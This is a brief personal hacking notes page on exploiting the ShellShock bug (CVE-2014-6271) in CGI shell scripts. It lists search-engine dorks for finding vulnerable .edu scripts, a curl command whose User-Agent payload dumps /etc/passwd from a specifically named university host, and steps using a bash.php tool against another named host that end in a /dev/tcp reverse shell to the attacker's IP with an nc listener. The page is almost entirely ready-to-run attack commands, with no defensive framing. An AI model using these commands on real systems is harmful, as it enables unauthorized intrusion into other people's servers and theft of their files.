
    版本為 15:19, 26 Dec 2024


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    A notes for being a hacker

    ShellShock (CVE-2014-6271)

    Scanning the target with Google

    inurl:cgi-bin filetype:sh site:edu
    inurl:/cgi-bin/ ext:sh 

    Attempt to get the username remotely

    curl -A "() { :;}; echo Content-type:text/plain;echo; /bin/cat /etc/passwd " http://www.physics.csbsju.edu/cgi-bin/stats/dir.sh

    Reverse SHELL

    > php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c ls

    if it response as 'Command sent to the server!', continue with the follows

    > php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c "/bin/bash -i >& /dev/tcp/here.is.my.IP/4444 0>&1"

    Open another terminal. issue the command

    > nc -lp 4444 -vv
    If all goes well, you can issue any commands here. 
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